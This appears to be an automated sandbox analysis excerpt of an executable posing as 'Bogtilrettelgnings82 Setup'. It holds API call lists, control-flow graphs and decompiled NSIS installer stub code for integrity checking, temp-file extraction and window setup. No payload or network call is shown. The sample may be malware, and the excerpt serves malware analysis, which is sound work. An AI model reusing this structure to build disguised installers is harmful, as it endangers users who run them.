                                                            0x00403ce9
                                                            0x00000000
                                                            0x00403cef
                                                            0x00403b1d
                                                            0x00403b1d
                                                            0x00403b21
                                                            0x00403b26
                                                            0x00403b35
                                                            0x00403b35
                                                            0x00403b3e
                                                            0x00403b47
                                                            0x00403b52
                                                            0x00403b52
                                                            0x00403b5e
                                                            0x00403b7a
                                                            0x00403b7d
                                                            0x00403b90
                                                            0x00403b96
                                                            0x00403c39
                                                            0x00000000
                                                            0x00403c42
                                                            0x00403b9c
                                                            0x00403ba9
                                                            0x00403bab
                                                            0x00403bad
                                                            0x00403bcc
                                                            0x00403bcc
                                                            0x00403bcf
                                                            0x00403bd4
                                                            0x00403bd7
                                                            0x00403be7
                                                            0x00403be8
                                                            0x00403bea
                                                            0x00403c20
                                                            0x00403c33
                                                            0x00000000
                                                            0x00403c33
                                                            0x00403bec
                                                            0x00403bf2
                                                            0x00403c0b
                                                            0x00403c10
                                                            0x00403c12
                                                            0x00000000
                                                            0x00000000
                                                            0x00403c14
                                                            0x00403c00
                                                            0x00403c00
                                                            0x00403c02
                                                            0x00403c02
                                                            0x00000000
                                                            0x00403c02
                                                            0x00403bf5
                                                            0x00403bfa
                                                            0x00000000
                                                            0x00403bfa
                                                            0x00403bd9
                                                            0x00403bdf
                                                            0x00000000
                                                            0x00000000
                                                            0x00403be1
                                                            0x00000000
                                                            0x00403be1
                                                            0x00403bd1
                                                            0x00000000
                                                            0x00403bd1
                                                            0x00403bb7
                                                            0x00403bbe
                                                            0x00403bc4
                                                            0x00403bc6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403bc6
                                                            0x00403b82
                                                            0x00000000
                                                            0x00403b60
                                                            0x00403b66
                                                            0x00403b70
                                                            0x00403f76
                                                            0x00403f7c
                                                            0x00403f7e
                                                            0x00403f84
                                                            0x00403f89
                                                            0x00403f8f
                                                            0x00403f8f
                                                            0x00403f84
                                                            0x00403f99
                                                            0x00000000
                                                            0x00403f99
                                                            0x00403b5e

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B35
                                                            • ShowWindow.USER32(?), ref: 00403B52
                                                            • DestroyWindow.USER32 ref: 00403B66
                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B82
                                                            • GetDlgItem.USER32(?,?), ref: 00403BA3
                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB7
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403BBE
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403C6C
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403C76
                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403C90
                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CE1
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403D87
                                                            • ShowWindow.USER32(00000000,?), ref: 00403DA8
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DBA
                                                            • EnableWindow.USER32(?,?), ref: 00403DD5
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DEB
                                                            • EnableMenuItem.USER32(00000000), ref: 00403DF2
                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E0A
                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1D
                                                            • lstrlenA.KERNEL32(Bogtilrettelgnings82 Setup: Installing,?,Bogtilrettelgnings82 Setup: Installing,Bogtilrettelgnings82 Setup), ref: 00403E46
                                                            • SetWindowTextA.USER32(?,Bogtilrettelgnings82 Setup: Installing), ref: 00403E55
                                                            • ShowWindow.USER32(?,0000000A), ref: 00403F89
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: Bogtilrettelgnings82 Setup$Bogtilrettelgnings82 Setup: Installing
                                                            • API String ID: 3282139019-1893935501
                                                            • Opcode ID: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                            • Instruction ID: d55a176a90e8b499f18b63baceb11f369ce23e9a5aae2cf9a731fb05d42b674d
                                                            • Opcode Fuzzy Hash: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                            • Instruction Fuzzy Hash: 20C1C271A04205BBDB206F61ED49E2B3E7CFB4470AF41443EF601B12E1C779A942AB5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 267 403767-40377f call 406009 270 403781-403791 call 405c3c 267->270 271 403793-4037c4 call 405bc5 267->271 280 4037e7-403810 call 403a2c call 40585c 270->280 276 4037c6-4037d7 call 405bc5 271->276 277 4037dc-4037e2 lstrcatA 271->277 276->277 277->280 285 403816-40381b 280->285 286 403897-40389f call 40585c 280->286 285->286 287 40381d-403835 call 405bc5 285->287 292 4038a1-4038a8 call 405d00 286->292 293 4038ad-4038d2 LoadImageA 286->293 291 40383a-403841 287->291 291->286 294 403843-403845 291->294 292->293 296 403953-40395b call 40140b 293->296 297 4038d4-403904 RegisterClassA 293->297 298 403856-403862 lstrlenA 294->298 299 403847-403854 call 405799 294->299 310 403965-403970 call 403a2c 296->310 311 40395d-403960 296->311 300 403a22 297->300 301 40390a-40394e SystemParametersInfoA CreateWindowExA 297->301 305 403864-403872 lstrcmpiA 298->305 306 40388a-403892 call 40576e call 405cde 298->306 299->298 303 403a24-403a2b 300->303 301->296 305->306 309 403874-40387e GetFileAttributesA 305->309 306->286 313 403880-403882 309->313 314 403884-403885 call 4057b5 309->314 320 403976-403993 ShowWindow LoadLibraryA 310->320 321 4039f9-4039fa call 40509b 310->321 311->303 313->306 313->314 314->306 322 403995-40399a LoadLibraryA 320->322 323 40399c-4039ae GetClassInfoA 320->323 327 4039ff-403a01 321->327 322->323 325 4039b0-4039c0 GetClassInfoA RegisterClassA 323->325 326 4039c6-4039e9 DialogBoxParamA call 40140b 323->326 325->326 332 4039ee-4039f7 call 4036b7 326->332 329 403a03-403a09 327->329 330 403a1b-403a1d call 40140b 327->330 329->311 333 403a0f-403a16 call 40140b 329->333 330->300 332->303 333->311
                                                            C-Code - Quality: 96%
                                                            			E00403767() {
                                                            				intOrPtr _v4;
                                                            				intOrPtr _v8;
                                                            				int _v12;
                                                            				void _v16;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t17;
                                                            				void* _t25;
                                                            				void* _t27;
                                                            				int _t28;
                                                            				void* _t31;
                                                            				struct HINSTANCE__* _t34;
                                                            				int _t35;
                                                            				intOrPtr _t36;
                                                            				int _t39;
                                                            				char _t57;
                                                            				CHAR* _t59;
                                                            				signed char _t63;
                                                            				CHAR* _t74;
                                                            				intOrPtr _t76;
                                                            				CHAR* _t82;
                                                            
                                                            				_t76 =  *0x4236f0;
                                                            				_t17 = E00406009(6);
                                                            				_t84 = _t17;
                                                            				if(_t17 == 0) {
                                                            					_t74 = 0x41fce0;
                                                            					"1033" = 0x30;
                                                            					 *0x42a001 = 0x78;
                                                            					 *0x42a002 = 0;
                                                            					E00405BC5(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x41fce0, 0);
                                                            					__eflags =  *0x41fce0; // 0x42
                                                            					if(__eflags == 0) {
                                                            						E00405BC5(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040730E, 0x41fce0, 0);
                                                            					}
                                                            					lstrcatA("1033", _t74);
                                                            				} else {
                                                            					E00405C3C("1033",  *_t17() & 0x0000ffff);
                                                            				}
                                                            				E00403A2C(_t71, _t84);
                                                            				_t81 = "C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant";
                                                            				 *0x423760 =  *0x4236f8 & 0x00000020;
                                                            				 *0x42377c = 0x10000;
                                                            				if(E0040585C(_t84, "C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant") != 0) {
                                                            					L16:
                                                            					if(E0040585C(_t92, _t81) == 0) {
                                                            						E00405D00(0, _t74, _t76, _t81,  *((intOrPtr*)(_t76 + 0x118))); // executed
                                                            					}
                                                            					_t25 = LoadImageA( *0x4236e0, 0x67, 1, 0, 0, 0x8040); // executed
                                                            					 *0x422ec8 = _t25;
                                                            					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                            						L21:
                                                            						if(E0040140B(0) == 0) {
                                                            							_t27 = E00403A2C(_t71, __eflags);
                                                            							__eflags =  *0x423780;
                                                            							if( *0x423780 != 0) {
                                                            								_t28 = E0040509B(_t27, 0);
                                                            								__eflags = _t28;
                                                            								if(_t28 == 0) {
                                                            									E0040140B(1);
                                                            									goto L33;
                                                            								}
                                                            								__eflags =  *0x422eac; // 0x0
                                                            								if(__eflags == 0) {
                                                            									E0040140B(2);
                                                            								}
                                                            								goto L22;
                                                            							}
                                                            							ShowWindow( *0x41fcc0, 5); // executed
                                                            							_t34 = LoadLibraryA("RichEd20"); // executed
                                                            							__eflags = _t34;
                                                            							if(_t34 == 0) {
                                                            								LoadLibraryA("RichEd32");
                                                            							}
                                                            							_t82 = "RichEdit20A";
                                                            							_t35 = GetClassInfoA(0, _t82, 0x422e80);
                                                            							__eflags = _t35;
                                                            							if(_t35 == 0) {
                                                            								GetClassInfoA(0, "RichEdit", 0x422e80);
                                                            								 *0x422ea4 = _t82;
                                                            								RegisterClassA(0x422e80);
                                                            							}
                                                            							_t36 =  *0x422ec0; // 0x0
                                                            							_t39 = DialogBoxParamA( *0x4236e0, _t36 + 0x00000069 & 0x0000ffff, 0, E00403AF9, 0); // executed
                                                            							E004036B7(E0040140B(5), 1);
                                                            							return _t39;
                                                            						}
                                                            						L22:
                                                            						_t31 = 2;
                                                            						return _t31;
                                                            					} else {
                                                            						_t71 =  *0x4236e0;
                                                            						 *0x422e84 = E00401000;
                                                            						 *0x422e90 =  *0x4236e0;
                                                            						 *0x422e94 = _t25;
                                                            						 *0x422ea4 = 0x409208;
                                                            						if(RegisterClassA(0x422e80) == 0) {
                                                            							L33:
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                            						 *0x41fcc0 = CreateWindowExA(0x80, 0x409208, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x4236e0, 0);
                                                            						goto L21;
                                                            					}
                                                            				} else {
                                                            					_t71 =  *(_t76 + 0x48);
                                                            					if(_t71 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					_t74 = 0x422680;
                                                            					E00405BC5( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x423718, 0x422680, 0);
                                                            					_t57 =  *0x422680; // 0x43
                                                            					if(_t57 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					if(_t57 == 0x22) {
                                                            						_t74 = 0x422681;
                                                            						 *((char*)(E00405799(0x422681, 0x22))) = 0;
                                                            					}
                                                            					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                            					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                            						L15:
                                                            						E00405CDE(_t81, E0040576E(_t74));
                                                            						goto L16;
                                                            					} else {
                                                            						_t63 = GetFileAttributesA(_t74);
                                                            						if(_t63 == 0xffffffff) {
                                                            							L14:
                                                            							E004057B5(_t74);
                                                            							goto L15;
                                                            						}
                                                            						_t92 = _t63 & 0x00000010;
                                                            						if((_t63 & 0x00000010) != 0) {
                                                            							goto L15;
                                                            						}
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            			}

























                                                            0x0040376d
                                                            0x00403776
                                                            0x0040377d
                                                            0x0040377f
                                                            0x00403793
                                                            0x004037a5
                                                            0x004037ac
                                                            0x004037b3
                                                            0x004037b9
                                                            0x004037be
                                                            0x004037c4
                                                            0x004037d7
                                                            0x004037d7
                                                            0x004037e2
                                                            0x00403781
                                                            0x0040378c
                                                            0x0040378c
                                                            0x004037e7
                                                            0x004037f1
                                                            0x004037fa
                                                            0x004037ff
                                                            0x00403810
                                                            0x00403897
                                                            0x0040389f
                                                            0x004038a8
                                                            0x004038a8
                                                            0x004038be
                                                            0x004038c4
                                                            0x004038d2
                                                            0x00403953
                                                            0x0040395b
                                                            0x00403965
                                                            0x0040396a
                                                            0x00403970
                                                            0x004039fa
                                                            0x004039ff
                                                            0x00403a01
                                                            0x00403a1d
                                                            0x00000000
                                                            0x00403a1d
                                                            0x00403a03
                                                            0x00403a09
                                                            0x00403a11
                                                            0x00403a11
                                                            0x00000000
                                                            0x00403a09
                                                            0x0040397e
                                                            0x0040398f
                                                            0x00403991
                                                            0x00403993
                                                            0x0040399a
                                                            0x0040399a
                                                            0x004039a2
                                                            0x004039aa
                                                            0x004039ac
                                                            0x004039ae
                                                            0x004039b7
                                                            0x004039ba
                                                            0x004039c0
                                                            0x004039c0
                                                            0x004039c6
                                                            0x004039df
                                                            0x004039f0
                                                            0x00000000
                                                            0x004039f5
                                                            0x0040395d
                                                            0x0040395f
                                                            0x00000000
                                                            0x004038d4
                                                            0x004038d4
                                                            0x004038e0
                                                            0x004038ea
                                                            0x004038f0
                                                            0x004038f5
                                                            0x00403904
                                                            0x00403a22
                                                            0x00403a22
                                                            0x00000000
                                                            0x00403a22
                                                            0x00403913
                                                            0x0040394e
                                                            0x00000000
                                                            0x0040394e
                                                            0x00403816
                                                            0x00403816
                                                            0x0040381b
                                                            0x00000000
                                                            0x00000000
                                                            0x00403825
                                                            0x00403835
                                                            0x0040383a
                                                            0x00403841
                                                            0x00000000
                                                            0x00000000
                                                            0x00403845
                                                            0x00403847
                                                            0x00403854
                                                            0x00403854
                                                            0x0040385c
                                                            0x00403862
                                                            0x0040388a
                                                            0x00403892
                                                            0x00000000
                                                            0x00403874
                                                            0x00403875
                                                            0x0040387e
                                                            0x00403884
                                                            0x00403885
                                                            0x00000000
                                                            0x00403885
                                                            0x00403880
                                                            0x00403882
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403882
                                                            0x00403862

                                                            APIs
                                                              • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                              • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                              • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                            • lstrcatA.KERNEL32(1033,Bogtilrettelgnings82 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Bogtilrettelgnings82 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\,776C3410,"C:\Users\user\Desktop\zp.exe",00000000), ref: 004037E2
                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Vkstcentrene\unprotuberant,1033,Bogtilrettelgnings82 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Bogtilrettelgnings82 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403857
                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 0040386A
                                                            • GetFileAttributesA.KERNEL32(Call), ref: 00403875
                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\Vkstcentrene\unprotuberant), ref: 004038BE
                                                              • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                            • RegisterClassA.USER32(00422E80), ref: 004038FB
                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403913
                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403948
                                                            • ShowWindow.USER32(00000005,00000000), ref: 0040397E
                                                            • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040398F
                                                            • LoadLibraryA.KERNEL32(RichEd32), ref: 0040399A
                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 004039AA
                                                            • GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 004039B7
                                                            • RegisterClassA.USER32(00422E80), ref: 004039C0
                                                            • DialogBoxParamA.USER32(?,00000000,00403AF9,00000000), ref: 004039DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\zp.exe"$.DEFAULT\Control Panel\International$.exe$1033$Bogtilrettelgnings82 Setup: Installing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Vkstcentrene\unprotuberant$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                            • API String ID: 914957316-4003323135
                                                            • Opcode ID: ea6de073139d456b46fed141b228fdd8787a9c88dc78c00038b2e5e02956a85b
                                                            • Instruction ID: f2042b1b728b60748b23566834e767a2e9ab566c559d5d3ffbf72b6bfa23c0d9
                                                            • Opcode Fuzzy Hash: ea6de073139d456b46fed141b228fdd8787a9c88dc78c00038b2e5e02956a85b
                                                            • Instruction Fuzzy Hash: 4861E4716442007EE320AF659D45F2B3EACEB4474AF40457FF940B22E2D7BD6D029A2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 338 402c79-402cc7 GetTickCount GetModuleFileNameA call 40596f 341 402cd3-402d01 call 405cde call 4057b5 call 405cde GetFileSize 338->341 342 402cc9-402cce 338->342 350 402df1-402dff call 402bda 341->350 351 402d07-402d1e 341->351 343 402f18-402f1c 342->343 357 402ed0-402ed5 350->357 358 402e05-402e08 350->358 353 402d20 351->353 354 402d22-402d2f call 4031b6 351->354 353->354 362 402d35-402d3b 354->362 363 402e8c-402e94 call 402bda 354->363 357->343 360 402e34-402e80 GlobalAlloc call 4060e9 call 40599e CreateFileA 358->360 361 402e0a-402e22 call 4031cc call 4031b6 358->361 387 402e82-402e87 360->387 388 402e96-402ec6 call 4031cc call 402f1f 360->388 361->357 390 402e28-402e2e 361->390 365 402dbb-402dbf 362->365 366 402d3d-402d55 call 40592a 362->366 363->357 373 402dc1-402dc7 call 402bda 365->373 374 402dc8-402dce 365->374 366->374 383 402d57-402d5e 366->383 373->374 375 402dd0-402dde call 40607b 374->375 376 402de1-402deb 374->376 375->376 376->350 376->351 383->374 389 402d60-402d67 383->389 387->343 398 402ecb-402ece 388->398 389->374 391 402d69-402d70 389->391 390->357 390->360 391->374 393 402d72-402d79 391->393 393->374 395 402d7b-402d9b 393->395 395->357 397 402da1-402da5 395->397 399 402da7-402dab 397->399 400 402dad-402db5 397->400 398->357 401 402ed7-402ee8 398->401 399->350 399->400 400->374 402 402db7-402db9 400->402 403 402ef0-402ef5 401->403 404 402eea 401->404 402->374 405 402ef6-402efc 403->405 404->403 405->405 406 402efe-402f16 call 40592a 405->406 406->343
                                                            C-Code - Quality: 96%
                                                            			E00402C79(void* __eflags, signed int _a4) {
                                                            				long _v8;
                                                            				long _v12;
                                                            				intOrPtr _v16;
                                                            				long _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				signed int _v40;
                                                            				char _v300;
                                                            				signed int _t54;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				intOrPtr _t65;
                                                            				void* _t68;
                                                            				intOrPtr* _t70;
                                                            				intOrPtr _t71;
                                                            				signed int _t77;
                                                            				signed int _t82;
                                                            				signed int _t83;
                                                            				signed int _t89;
                                                            				intOrPtr _t92;
                                                            				signed int _t101;
                                                            				signed int _t103;
                                                            				void* _t105;
                                                            				signed int _t106;
                                                            				signed int _t109;
                                                            				void* _t110;
                                                            
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				 *0x4236ec = GetTickCount() + 0x3e8;
                                                            				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\zp.exe", 0x400);
                                                            				_t105 = E0040596F("C:\\Users\\Arthur\\Desktop\\zp.exe", 0x80000000, 3);
                                                            				 *0x409018 = _t105;
                                                            				if(_t105 == 0xffffffff) {
                                                            					return "Error launching installer";
                                                            				}
                                                            				E00405CDE("C:\\Users\\Arthur\\Desktop", "C:\\Users\\Arthur\\Desktop\\zp.exe");
                                                            				E00405CDE(0x42b000, E004057B5("C:\\Users\\Arthur\\Desktop"));
                                                            				_t54 = GetFileSize(_t105, 0);
                                                            				__eflags = _t54;
                                                            				 *0x41e898 = _t54;
                                                            				_t109 = _t54;
                                                            				if(_t54 <= 0) {
                                                            					L22:
                                                            					E00402BDA(1);
                                                            					__eflags =  *0x4236f4;
                                                            					if( *0x4236f4 == 0) {
                                                            						goto L30;
                                                            					}
                                                            					__eflags = _v12;
                                                            					if(_v12 == 0) {
                                                            						L26:
                                                            						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                            						_t110 = _t57;
                                                            						E004060E9(0x40a800);
                                                            						E0040599E( &_v300, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                            						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                            						__eflags = _t62 - 0xffffffff;
                                                            						 *0x40901c = _t62;
                                                            						if(_t62 != 0xffffffff) {
                                                            							_t65 = E004031CC( *0x4236f4 + 0x1c);
                                                            							 *0x41e89c = _t65;
                                                            							 *0x416890 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                            							_t68 = E00402F1F(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                            							__eflags = _t68 - _v20;
                                                            							if(_t68 == _v20) {
                                                            								__eflags = _v40 & 0x00000001;
                                                            								 *0x4236f0 = _t110;
                                                            								 *0x4236f8 =  *_t110;
                                                            								if((_v40 & 0x00000001) != 0) {
                                                            									 *0x4236fc =  *0x4236fc + 1;
                                                            									__eflags =  *0x4236fc;
                                                            								}
                                                            								_t45 = _t110 + 0x44; // 0x44
                                                            								_t70 = _t45;
                                                            								_t101 = 8;
                                                            								do {
                                                            									_t70 = _t70 - 8;
                                                            									 *_t70 =  *_t70 + _t110;
                                                            									_t101 = _t101 - 1;
                                                            									__eflags = _t101;
                                                            								} while (_t101 != 0);
                                                            								_t71 =  *0x41688c; // 0x44ff
                                                            								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                            								E0040592A(0x423700, _t110 + 4, 0x40);
                                                            								__eflags = 0;
                                                            								return 0;
                                                            							}
                                                            							goto L30;
                                                            						}
                                                            						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                            					}
                                                            					E004031CC( *0x416888);
                                                            					_t77 = E004031B6( &_a4, 4);
                                                            					__eflags = _t77;
                                                            					if(_t77 == 0) {
                                                            						goto L30;
                                                            					}
                                                            					__eflags = _v8 - _a4;
                                                            					if(_v8 != _a4) {
                                                            						goto L30;
                                                            					}
                                                            					goto L26;
                                                            				} else {
                                                            					do {
                                                            						_t106 = _t109;
                                                            						asm("sbb eax, eax");
                                                            						_t82 = ( ~( *0x4236f4) & 0x00007e00) + 0x200;
                                                            						__eflags = _t109 - _t82;
                                                            						if(_t109 >= _t82) {
                                                            							_t106 = _t82;
                                                            						}
                                                            						_t83 = E004031B6(0x416898, _t106);
                                                            						__eflags = _t83;
                                                            						if(_t83 == 0) {
                                                            							E00402BDA(1);
                                                            							L30:
                                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                            						}
                                                            						__eflags =  *0x4236f4;
                                                            						if( *0x4236f4 != 0) {
                                                            							__eflags = _a4 & 0x00000002;
                                                            							if((_a4 & 0x00000002) == 0) {
                                                            								E00402BDA(0);
                                                            							}
                                                            							goto L19;
                                                            						}
                                                            						E0040592A( &_v40, 0x416898, 0x1c);
                                                            						_t89 = _v40;
                                                            						__eflags = _t89 & 0xfffffff0;
                                                            						if((_t89 & 0xfffffff0) != 0) {
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _v36 - 0xdeadbeef;
                                                            						if(_v36 != 0xdeadbeef) {
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _v24 - 0x74736e49;
                                                            						if(_v24 != 0x74736e49) {
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _v28 - 0x74666f73;
                                                            						if(_v28 != 0x74666f73) {
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _v32 - 0x6c6c754e;
                                                            						if(_v32 != 0x6c6c754e) {
                                                            							goto L19;
                                                            						}
                                                            						_a4 = _a4 | _t89;
                                                            						_t103 =  *0x416888; // 0x23753
                                                            						 *0x423780 =  *0x423780 | _a4 & 0x00000002;
                                                            						_t92 = _v16;
                                                            						__eflags = _t92 - _t109;
                                                            						 *0x4236f4 = _t103;
                                                            						if(_t92 > _t109) {
                                                            							goto L30;
                                                            						}
                                                            						__eflags = _a4 & 0x00000008;
                                                            						if((_a4 & 0x00000008) != 0) {
                                                            							L15:
                                                            							_v12 = _v12 + 1;
                                                            							_t109 = _t92 - 4;
                                                            							__eflags = _t106 - _t109;
                                                            							if(_t106 > _t109) {
                                                            								_t106 = _t109;
                                                            							}
                                                            							goto L19;
                                                            						}
                                                            						__eflags = _a4 & 0x00000004;
                                                            						if((_a4 & 0x00000004) != 0) {
                                                            							goto L22;
                                                            						}
                                                            						goto L15;
                                                            						L19:
                                                            						__eflags = _t109 -  *0x41e898; // 0x1be16
                                                            						if(__eflags < 0) {
                                                            							_v8 = E0040607B(_v8, 0x416898, _t106);
                                                            						}
                                                            						 *0x416888 =  *0x416888 + _t106;
                                                            						_t109 = _t109 - _t106;
                                                            						__eflags = _t109;
                                                            					} while (_t109 > 0);
                                                            					goto L22;
                                                            				}
                                                            			}































                                                            0x00402c87
                                                            0x00402c8a
                                                            0x00402ca4
                                                            0x00402ca9
                                                            0x00402cbc
                                                            0x00402cc1
                                                            0x00402cc7
                                                            0x00000000
                                                            0x00402cc9
                                                            0x00402cda
                                                            0x00402ceb
                                                            0x00402cf2
                                                            0x00402cf8
                                                            0x00402cfa
                                                            0x00402cff
                                                            0x00402d01
                                                            0x00402df1
                                                            0x00402df3
                                                            0x00402df8
                                                            0x00402dff
                                                            0x00000000
                                                            0x00000000
                                                            0x00402e05
                                                            0x00402e08
                                                            0x00402e34
                                                            0x00402e39
                                                            0x00402e44
                                                            0x00402e46
                                                            0x00402e57
                                                            0x00402e72
                                                            0x00402e78
                                                            0x00402e7b
                                                            0x00402e80
                                                            0x00402e9f
                                                            0x00402eaf
                                                            0x00402ec1
                                                            0x00402ec6
                                                            0x00402ecb
                                                            0x00402ece
                                                            0x00402ed7
                                                            0x00402edb
                                                            0x00402ee3
                                                            0x00402ee8
                                                            0x00402eea
                                                            0x00402eea
                                                            0x00402eea
                                                            0x00402ef2
                                                            0x00402ef2
                                                            0x00402ef5
                                                            0x00402ef6
                                                            0x00402ef6
                                                            0x00402ef9
                                                            0x00402efb
                                                            0x00402efb
                                                            0x00402efb
                                                            0x00402efe
                                                            0x00402f05
                                                            0x00402f11
                                                            0x00402f16
                                                            0x00000000
                                                            0x00402f16
                                                            0x00000000
                                                            0x00402ece
                                                            0x00000000
                                                            0x00402e82
                                                            0x00402e10
                                                            0x00402e1b
                                                            0x00402e20
